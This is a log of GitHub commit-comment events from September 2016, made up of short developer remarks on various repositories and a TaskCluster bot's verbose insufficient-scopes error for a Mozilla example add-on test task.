{"id":"4618742174","type":"CommitCommentEvent","actor":{"login":"SarthakNarang"},"repo":{"name":"SarthakNarang/android_device_oneplus_onyx"},"payload":{"comment":{"id":19174883,"position":null,"line":null,"path":null,"commit_id":"2f27b4a8e9c13ded46c6e5aebd9c8a865c7a847b","created_at":"2016-09-26T16:01:57Z","updated_at":"2016-09-26T16:01:57Z","body":"@Ordenkrieger yep"}},"created_at":"2016-09-26T16:01:57Z"}
{"id":"4618743241","type":"CommitCommentEvent","actor":{"login":"wundrweapon"},"repo":{"name":"CraftSpider/CraftBin"},"payload":{"comment":{"id":19174886,"position":null,"line":null,"path":null,"commit_id":"79638e1545eb4793ed2dcef55d87f4b2ee61a3fb","created_at":"2016-09-26T16:02:07Z","updated_at":"2016-09-26T16:02:07Z","body":"idc if it's in this commit or not but there is thievery here"}},"created_at":"2016-09-26T16:02:07Z"}
{"id":"4618750225","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19174904,"position":null,"line":null,"path":null,"commit_id":"f63614e6dcfe8df4d2f23ce72c0adc54415d2af7","created_at":"2016-09-26T16:03:12Z","updated_at":"2016-09-26T16:03:12Z","body":"Submitting the task to TaskCluster failed. You didn't give the task-graph scopes allowing it define tasks on the queue.Details:\n\n```js\n[\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:define-task:aws-provisioner-v1/win2012r2\\\"\\n  ],\\n  [\\n    \\\"queue:create-task:aws-provisioner-v1/win2012r2\\\"\\n  ],\\n  [\\n    \\\"queue:define-task:aws-provisioner-v1/win2012r2\\\",\\n    \\\"queue:task-group-id:task-graph-scheduler/FAYpjZztQ9Oy-iv0D2pUEw\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla/example-addon-repo:branch:windows-functional\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:get:repo:github.com/mozilla/example-addon-repo:*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:define-task:aws-provisioner-v1/win2012r2\\\"\\n * Option 1:\\n    - \\\"queue:create-task:aws-provisioner-v1/win2012r2\\\"\\n * Option 2:\\n    - \\\"queue:define-task:aws-provisioner-v1/win2012r2\\\", and\\n    - \\\"queue:task-group-id:task-graph-scheduler/FAYpjZztQ9Oy-iv0D2pUEw\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"NGU8OlqcTWSfsohQlTYA3Q\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Example Add-on Functional Tests Windows\\\",\\n    \\\"description\\\": \\\"Example Add-on Functional Tests Windows\\\",\\n    \\\"owner\\\": \\\"Standard8@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla/example-addon-repo.git\\\"\\n  },\\n  \\\"workerType\\\": \\\"win2012r2\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 1200,\\n    \\\"command\\\": [\\n      \\\"git clone https://github.com/mozilla/example-addon-repo.git repo\\\",\\n      \\\"cd repo\\\",\\n      \\\"git checkout master\\\",\\n      \\\"npm install\\\",\\n      \\\"npm run test:func\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"windows-functional\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"19b82f5106545d350fa9eddd69896db8d6963aec\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"windows-functional\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla/example-addon-repo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"Standard8\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"f63614e6dcfe8df4d2f23ce72c0adc54415d2af7\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"windows-functional\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"Standard8@noreply.github.com\\\"\\n    }\\n  },\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"jobKind\\\": \\\"test\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"lint\\\"\\n      },\\n      \\\"symbol\\\": \\\"ES\\\"\\n    }\\n  },\\n  \\\"created\\\": \\\"2016-09-26T16:03:10.699Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-27T16:03:10.699Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"FAYpjZztQ9Oy-iv0D2pUEw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-27T16:03:10.699Z\\\"\\n}\\n  time:     2016-09-26T16:03:10.872Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:define-task:aws-provisioner-v1/win2012r2\\\"\\n    ],\\n    [\\n      \\\"queue:create-task:aws-provisioner-v1/win2012r2\\\"\\n    ],\\n    [\\n      \\\"queue:define-task:aws-provisioner-v1/win2012r2\\\",\\n      \\\"queue:task-group-id:task-graph-scheduler/FAYpjZztQ9Oy-iv0D2pUEw\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla/example-addon-repo:branch:windows-functional\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:get:repo:github.com/mozilla/example-addon-repo:*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:define-task:aws-provisioner-v1/win2012r2\\\"\\n  ],\\n  [\\n    \\\"queue:create-task:aws-provisioner-v1/win2012r2\\\"\\n  ],\\n  [\\n    \\\"queue:define-task:aws-provisioner-v1/win2012r2\\\",\\n    \\\"queue:task-group-id:task-graph-scheduler/FAYpjZztQ9Oy-iv0D2pUEw\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla/example-addon-repo:branch:windows-functional\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:get:repo:github.com/mozilla/example-addon-repo:*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:define-task:aws-provisioner-v1/win2012r2\\\"\\n * Option 1:\\n    - \\\"queue:create-task:aws-provisioner-v1/win2012r2\\\"\\n * Option 2:\\n    - \\\"queue:define-task:aws-provisioner-v1/win2012r2\\\", and\\n    - \\\"queue:task-group-id:task-graph-scheduler/FAYpjZztQ9Oy-iv0D2pUEw\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"NGU8OlqcTWSfsohQlTYA3Q\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Example Add-on Functional Tests Windows\\\",\\n    \\\"description\\\": \\\"Example Add-on Functional Tests Windows\\\",\\n    \\\"owner\\\": \\\"Standard8@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla/example-addon-repo.git\\\"\\n  },\\n  \\\"workerType\\\": \\\"win2012r2\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 1200,\\n    \\\"command\\\": [\\n      \\\"git clone https://github.com/mozilla/example-addon-repo.git repo\\\",\\n      \\\"cd repo\\\",\\n      \\\"git checkout master\\\",\\n      \\\"npm install\\\",\\n      \\\"npm run test:func\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"windows-functional\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"19b82f5106545d350fa9eddd69896db8d6963aec\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"windows-functional\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla/example-addon-repo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"Standard8\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"f63614e6dcfe8df4d2f23ce72c0adc54415d2af7\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"windows-functional\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"Standard8@noreply.github.com\\\"\\n    }\\n  },\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"jobKind\\\": \\\"test\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"lint\\\"\\n      },\\n      \\\"symbol\\\": \\\"ES\\\"\\n    }\\n  },\\n  \\\"created\\\": \\\"2016-09-26T16:03:10.699Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-27T16:03:10.699Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"FAYpjZztQ9Oy-iv0D2pUEw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-27T16:03:10.699Z\\\"\\n}\\n  time:     2016-09-26T16:03:10.872Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:define-task:aws-provisioner-v1/win2012r2\\\"\\n    ],\\n    [\\n      \\\"queue:create-task:aws-provisioner-v1/win2012r2\\\"\\n    ],\\n    [\\n      \\\"queue:define-task:aws-provisioner-v1/win2012r2\\\",\\n      \\\"queue:task-group-id:task-graph-scheduler/FAYpjZztQ9Oy-iv0D2pUEw\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla/example-addon-repo:branch:windows-functional\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:get:repo:github.com/mozilla/example-addon-repo:*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"NGU8OlqcTWSfsohQlTYA3Q\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"metadata\": {\n                        \"name\": \"Example Add-on Functional Tests Windows\",\n                        \"description\": \"Example Add-on Functional Tests Windows\",\n                        \"owner\": \"Standard8@noreply.github.com\",\n                        \"source\": \"https://github.com/mozilla/example-addon-repo.git\"\n                    },\n                    \"workerType\": \"win2012r2\",\n                    \"payload\": {\n                        \"maxRunTime\": 1200,\n                        \"command\": [\n                            \"git clone https://github.com/mozilla/example-addon-repo.git repo\",\n                            \"cd repo\",\n                            \"git checkout master\",\n                            \"npm install\",\n                            \"npm run test:func\"\n                        ],\n                        \"env\": {\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"windows-functional\",\n                            \"GITHUB_BASE_SHA\": \"19b82f5106545d350fa9eddd69896db8d6963aec\",\n                            \"GITHUB_BASE_BRANCH\": \"windows-functional\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla/example-addon-repo.git\",\n                            \"GITHUB_HEAD_USER\": \"Standard8\",\n                            \"GITHUB_HEAD_SHA\": \"f63614e6dcfe8df4d2f23ce72c0adc54415d2af7\",\n                            \"GITHUB_HEAD_BRANCH\": \"windows-functional\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"Standard8@noreply.github.com\"\n                        }\n                    },\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        },\n                        \"treeherder\": {\n                            \"jobKind\": \"test\",\n                            \"machine\": {\n                                \"platform\": \"lint\"\n                            },\n                            \"symbol\": \"ES\"\n                        }\n                    },\n                    \"created\": \"2016-09-26T16:03:10.699Z\",\n                    \"deadline\": \"2016-09-27T16:03:10.699Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"FAYpjZztQ9Oy-iv0D2pUEw\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-27T16:03:10.699Z\"\n                },\n                \"time\": \"2016-09-26T16:03:10.872Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:define-task:aws-provisioner-v1/win2012r2\"\n                    ],\n                    [\n                        \"queue:create-task:aws-provisioner-v1/win2012r2\"\n                    ],\n                    [\n                        \"queue:define-task:aws-provisioner-v1/win2012r2\",\n                        \"queue:task-group-id:task-graph-scheduler/FAYpjZztQ9Oy-iv0D2pUEw\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla/example-addon-repo:branch:windows-functional\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:get:repo:github.com/mozilla/example-addon-repo:*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    }\n]\n```"}},"created_at":"2016-09-26T16:03:12Z"}
{"id":"4618757668","type":"CommitCommentEvent","actor":{"login":"smowton"},"repo":{"name":"trtikm/cbmc"},"payload":{"comment":{"id":19174922,"position":null,"line":null,"path":null,"commit_id":"b1f358f6bdf2865974edf1e61ee14f914b5abf7e","created_at":"2016-09-26T16:04:23Z","updated_at":"2016-09-26T16:04:23Z","body":"Note there are currently some CRLF-terminated files under `regression`, so when checking out a fresh copy of the repo (or `git checkout`'ing individual files) they are immediately mangled and marked dirty. It's surprisingly hard to convince git to stop complaining and let me check out a branch!"}},"created_at":"2016-09-26T16:04:23Z"}
{"id":"4618761479","type":"CommitCommentEvent","actor":{"login":"winniex1"},"repo":{"name":"vmware/liota"},"payload":{"comment":{"id":19174931,"position":15,"line":43,"path":"liota/lib/transports/web_socket.py","commit_id":"edbf61b476c1f0a6fbae4fa7dd1f9c527b129d23","created_at":"2016-09-26T16:05:05Z","updated_at":"2016-09-26T16:05:05Z","body":":( I did not try to commit this file in. The git commit has some wired behavior. Although I did not (git add file), it was still committed in.\r\nThanks for making it in a correct way. I do need to figure out why my git commit has this kind of wired behavior. "}},"created_at":"2016-09-26T16:05:05Z"}
{"id":"4618762012","type":"CommitCommentEvent","actor":{"login":"satya164"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19174932,"position":null,"line":null,"path":null,"commit_id":"38979f9c68bd054aca3c6102635b2005914506b1","created_at":"2016-09-26T16:05:07Z","updated_at":"2016-09-26T16:05:07Z","body":"@bd-arc I was suggesting to add position absolute only on the header, not the scene. Looks like there's a `<View />` wrapping the header which might be messing it up. I'm not sure why it's there. maybe @hedgerwang can provide some insight\r\n\r\n"}},"created_at":"2016-09-26T16:05:07Z"}
{"id":"4618764272","type":"CommitCommentEvent","actor":{"login":"mailmindlin"},"repo":{"name":"Divisors/js_ast"},"payload":{"comment":{"id":19174936,"position":null,"line":null,"path":null,"commit_id":"bac4a7b6eb1301723936cffa255eeba73812e4fd","created_at":"2016-09-26T16:05:33Z","updated_at":"2016-09-26T16:05:33Z","body":"Woo! Commit #365!"}},"created_at":"2016-09-26T16:05:33Z"}
{"id":"4618765288","type":"CommitCommentEvent","actor":{"login":"vwchu"},"repo":{"name":"mmistakes/minimal-mistakes"},"payload":{"comment":{"id":19174940,"position":5,"line":11,"path":"_includes/author-profile.html","commit_id":"77c5642803eb3d76dc90e3008663c516d7b2829e","created_at":"2016-09-26T16:05:43Z","updated_at":"2016-09-26T16:05:43Z","body":"This must be a bug. The absolute URL is being prepended by a slash."}},"created_at":"2016-09-26T16:05:43Z"}
{"id":"4618766235","type":"CommitCommentEvent","actor":{"login":"testcc1"},"repo":{"name":"testcc1/Github_repo"},"payload":{"comment":{"id":19174941,"position":null,"line":null,"path":null,"commit_id":"4c61f693415e79e9499c5c1589988e7925822981","created_at":"2016-09-26T16:05:52Z","updated_at":"2016-09-26T16:05:52Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://127.0.0.1:8080/ui#review:id=56)"}},"created_at":"2016-09-26T16:05:52Z"}
{"id":"4618774420","type":"CommitCommentEvent","actor":{"login":"avdaredevil"},"repo":{"name":"avdaredevil/Alpha-Demo"},"payload":{"comment":{"id":19174962,"position":null,"line":null,"path":null,"commit_id":"35086536e176cbde2ae52a9b7e0f9762d96c12ab","created_at":"2016-09-26T16:07:15Z","updated_at":"2016-09-26T16:07:15Z","body":"This is a music removal commit!"}},"created_at":"2016-09-26T16:07:15Z"}
{"id":"4618780450","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/releasetasks"},"payload":{"comment":{"id":19174994,"position":null,"line":null,"path":null,"commit_id":"fc3bae378a27812d7a9e74011ec4700fcb6b58fa","created_at":"2016-09-26T16:08:21Z","updated_at":"2016-09-26T16:08:21Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#X59O_nQdRCi4CXYOsHFTcw"}},"created_at":"2016-09-26T16:08:21Z"}
{"id":"4618782084","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/releasetasks"},"payload":{"comment":{"id":19175003,"position":null,"line":null,"path":null,"commit_id":"1de05c46150691b180bb8d2499fd29063aa4d1b7","created_at":"2016-09-26T16:08:37Z","updated_at":"2016-09-26T16:08:37Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#cQijogFpSuCSDIlr4LKqgw"}},"created_at":"2016-09-26T16:08:37Z"}
{"id":"4618783268","type":"CommitCommentEvent","actor":{"login":"dimvar"},"repo":{"name":"google/closure-compiler"},"payload":{"comment":{"id":19175006,"position":null,"line":null,"path":null,"commit_id":"82f23897059d244d793518a1355fe2e1cc0ba80f","created_at":"2016-09-26T16:08:50Z","updated_at":"2016-09-26T16:08:50Z","body":"No, these are not expected.\r\n\r\nAre you using NTI? The typed percentage is only implemented for the old type checker, which should be unaffected by this commit.\r\n\r\nThe code size regression sounds like a bug, so if you can post a repro, I will look into it."}},"created_at":"2016-09-26T16:08:50Z"}
{"id":"4618783766","type":"CommitCommentEvent","actor":{"login":"elfet"},"repo":{"name":"deployphp/deployer"},"payload":{"comment":{"id":19175007,"position":null,"line":null,"path":null,"commit_id":"f9b8b73b568afb6f8894ec0b52b9649a9dfc6c83","created_at":"2016-09-26T16:08:54Z","updated_at":"2016-09-26T16:08:54Z","body":"Cool :+1:"}},"created_at":"2016-09-26T16:08:54Z"}
{"id":"4618786725","type":"CommitCommentEvent","actor":{"login":"mmistakes"},"repo":{"name":"mmistakes/minimal-mistakes"},"payload":{"comment":{"id":19175020,"position":5,"line":11,"path":"_includes/author-profile.html","commit_id":"77c5642803eb3d76dc90e3008663c516d7b2829e","created_at":"2016-09-26T16:09:26Z","updated_at":"2016-09-26T16:09:26Z","body":"Good catch."}},"created_at":"2016-09-26T16:09:26Z"}
{"id":"4618789941","type":"CommitCommentEvent","actor":{"login":"kalturaguy"},"repo":{"name":"kaltura/liveDVR"},"payload":{"comment":{"id":19175031,"position":5,"line":238,"path":"node_addons/FormatConverter/src/Converter.cpp","commit_id":"be857030d68cdb48aa64c8ed7aee5d6cbb4969a0","created_at":"2016-09-26T16:10:00Z","updated_at":"2016-09-26T16:10:00Z","body":"still there is a difference..."}},"created_at":"2016-09-26T16:10:00Z"}
{"id":"4618792097","type":"CommitCommentEvent","actor":{"login":"Ordenkrieger"},"repo":{"name":"SarthakNarang/android_device_oneplus_onyx"},"payload":{"comment":{"id":19175037,"position":null,"line":null,"path":null,"commit_id":"2f27b4a8e9c13ded46c6e5aebd9c8a865c7a847b","created_at":"2016-09-26T16:10:21Z","updated_at":"2016-09-26T16:10:21Z","body":"For what? We dont support vulkan or?"}},"created_at":"2016-09-26T16:10:21Z"}
{"id":"4618793554","type":"CommitCommentEvent","actor":{"login":"tas50"},"repo":{"name":"chef-cookbooks/dmg"},"payload":{"comment":{"id":19175040,"position":4,"line":5,"path":"CHANGELOG.md","commit_id":"985b56da41ad71de1287043fa30b73dbd0590543","created_at":"2016-09-26T16:10:35Z","updated_at":"2016-09-26T16:10:35Z","body":"It looks like my initial release failed. I just pushed it again now."}},"created_at":"2016-09-26T16:10:35Z"}
{"id":"4618793641","type":"CommitCommentEvent","actor":{"login":"jamesdixon"},"repo":{"name":"chmln/flatpickr"},"payload":{"comment":{"id":19175041,"position":null,"line":null,"path":null,"commit_id":"7f9a3cd4373d89907e6622f6b94f8faab9eb36de","created_at":"2016-09-26T16:10:35Z","updated_at":"2016-09-26T16:10:35Z","body":"@chmln can't wait to check this out!"}},"created_at":"2016-09-26T16:10:35Z"}
{"id":"4618794751","type":"CommitCommentEvent","actor":{"login":"lxg776"},"repo":{"name":"lxg776/jxw1"},"payload":{"comment":{"id":19175044,"position":null,"line":null,"path":null,"commit_id":"496d5cc4296c798c73b76a5c6c1e1d748bbe7a33","created_at":"2016-09-26T16:10:46Z","updated_at":"2016-09-26T16:10:46Z","body":"首页隐藏发现栏目"}},"created_at":"2016-09-26T16:10:46Z"}
{"id":"4618796829","type":"CommitCommentEvent","actor":{"login":"peabee"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19175045,"position":null,"line":null,"path":null,"commit_id":"81d8d031482691f7d0f62d56ef41a29dc85049bd","created_at":"2016-09-26T16:11:08Z","updated_at":"2016-09-26T16:11:08Z","body":"Compiled OK for me (32-bit) - had to install both devx and kernel-headers - however binary size is just shy of 400K - presumably will shrink when packaged....\r\n\r\nWould not open /usr/share/doc/index.html\r\n\r\n![screenshot](https://cloud.githubusercontent.com/assets/5926865/18842075/c04a2bac-840b-11e6-828e-225a96413dc7.png)\r\n"}},"created_at":"2016-09-26T16:11:08Z"}
{"id":"4618798381","type":"CommitCommentEvent","actor":{"login":"glennpratt"},"repo":{"name":"percona/percona-server"},"payload":{"comment":{"id":19175049,"position":19,"line":142,"path":"build-ps/debian/percona-server-server-5.6.postinst","commit_id":"bf2e9068f8269fb32d2c36918bc067b383b6d950","created_at":"2016-09-26T16:11:24Z","updated_at":"2016-09-26T16:11:24Z","body":"This comment seems to conflict with the commit message.\r\n\r\n> run mysql_install_db only on upgrade in debian\r\n\r\nI continued to see this script run while upgrading to `5.6.32-78.0` on Ubuntu.\r\n\r\nAlso, seem to be seeing this behavior continue on "}},"created_at":"2016-09-26T16:11:24Z"}
{"id":"4618802916","type":"CommitCommentEvent","actor":{"login":"andrewfritz86"},"repo":{"name":"abb1991/todo-react-native"},"payload":{"comment":{"id":19175064,"position":17,"line":21,"path":"index.ios.js","commit_id":"49813f49248ce87b00d6ece7bc934e1e2c1711da","created_at":"2016-09-26T16:12:08Z","updated_at":"2016-09-26T16:12:08Z","body":"IM GETTING CONTROLLED BY GALAEIYKAH"}},"created_at":"2016-09-26T16:12:08Z"}
{"id":"4618808133","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19175079,"position":null,"line":null,"path":null,"commit_id":"9431020391ef0203e3df7b9c9558901e584c6480","created_at":"2016-09-26T16:13:04Z","updated_at":"2016-09-26T16:13:04Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#QYjs4-h0RiunS_dngQlWxw"}},"created_at":"2016-09-26T16:13:04Z"}
{"id":"4618808795","type":"CommitCommentEvent","actor":{"login":"dineshadepu"},"repo":{"name":"dineshadepu/SDES2016"},"payload":{"comment":{"id":19175082,"position":null,"line":null,"path":null,"commit_id":"eddb7296b4bd98070ebf51cd5f4668516a347251","created_at":"2016-09-26T16:13:10Z","updated_at":"2016-09-26T16:13:10Z","body":"readme"}},"created_at":"2016-09-26T16:13:10Z"}
{"id":"4618822247","type":"CommitCommentEvent","actor":{"login":"envomer"},"repo":{"name":"laravel/valet"},"payload":{"comment":{"id":19175107,"position":null,"line":null,"path":null,"commit_id":"8fc59dd74870db1a84375da8f128892ef55a575a","created_at":"2016-09-26T16:15:31Z","updated_at":"2016-09-26T16:15:31Z","body":"@adamwathan thanks :D will do ^^"}},"created_at":"2016-09-26T16:15:31Z"}
{"id":"4618833252","type":"CommitCommentEvent","actor":{"login":"mercury233"},"repo":{"name":"EerieCode/EC3"},"payload":{"comment":{"id":19175123,"position":null,"line":null,"path":null,"commit_id":"ab76f8130db4cf660c63b882a66f63b4de4a304d","created_at":"2016-09-26T16:17:17Z","updated_at":"2016-09-26T16:17:17Z","body":"why don't add those effect to any beast-warrior xyz monster and use `c7514.spcon` to decide if those effect is avail?"}},"created_at":"2016-09-26T16:17:17Z"}
{"id":"4618838029","type":"CommitCommentEvent","actor":{"login":"RobinN7"},"repo":{"name":"7Robot/TRR2016"},"payload":{"comment":{"id":19175131,"position":null,"line":null,"path":null,"commit_id":"dece811bd61b591cbdd973229bb861def09679c3","created_at":"2016-09-26T16:18:06Z","updated_at":"2016-09-26T16:18:06Z","body":"100% approved 👍  \r\nIl faut garder les bonnes habitudes :)"}},"created_at":"2016-09-26T16:18:06Z"}
{"id":"4618851744","type":"CommitCommentEvent","actor":{"login":"julienmalik"},"repo":{"name":"senbox-org/s2tbx"},"payload":{"comment":{"id":19175161,"position":null,"line":null,"path":null,"commit_id":"0d98424339ae8d3def6421f1a4a8d31cf834cc2f","created_at":"2016-09-26T16:20:29Z","updated_at":"2016-09-26T16:20:29Z","body":"The build is failing, there seems to be a missing pom.xml"}},"created_at":"2016-09-26T16:20:29Z"}
{"id":"4618853172","type":"CommitCommentEvent","actor":{"login":"Siedlerchr"},"repo":{"name":"JabRef/jabref"},"payload":{"comment":{"id":19175165,"position":12,"line":411,"path":"src/main/java/net/sf/jabref/gui/maintable/MainTableSelectionListener.java","commit_id":"e4dec24eb0a48be7862ab2a5986883023d12c062","created_at":"2016-09-26T16:20:44Z","updated_at":"2016-09-26T16:20:44Z","body":"@tobiasdiez  Could you fix this just in master"}},"created_at":"2016-09-26T16:20:44Z"}
{"id":"4618853392","type":"CommitCommentEvent","actor":{"login":"bd-arc"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19175164,"position":null,"line":null,"path":null,"commit_id":"38979f9c68bd054aca3c6102635b2005914506b1","created_at":"2016-09-26T16:20:43Z","updated_at":"2016-09-26T16:20:43Z","body":"@satya164 Oh, ok; I did not get that. But anyway, as mentioned, I've tried it without success. I agree with you regarding the wrapping `<View />`; would love to hear more from @hedgerwang about that ;)"}},"created_at":"2016-09-26T16:20:43Z"}
{"id":"4618858702","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"alepuccetti/scope-traffic-control"},"payload":{"comment":{"id":19175176,"position":27,"line":19,"path":"circle.yml","commit_id":"b49fe548b9da7df1e10e9cce6c1633c7d97183d9","created_at":"2016-09-26T16:21:40Z","updated_at":"2016-09-26T16:21:40Z","body":"do we still need the \"sudo apt-get update\"?"}},"created_at":"2016-09-26T16:21:40Z"}
{"id":"4618859478","type":"CommitCommentEvent","actor":{"login":"ericmick"},"repo":{"name":"ericmick/graf"},"payload":{"comment":{"id":19175178,"position":null,"line":null,"path":null,"commit_id":"00856bfeaf494267ce7a750b8ee2e5d49433329c","created_at":"2016-09-26T16:21:49Z","updated_at":"2016-09-26T16:21:49Z","body":"Instead of passing an object + if/else, could you define a method that takes a vertex index and returns a point, taking into account dragging?  Also, please camel case local variables (aPoint, not a_point)?"}},"created_at":"2016-09-26T16:21:49Z"}
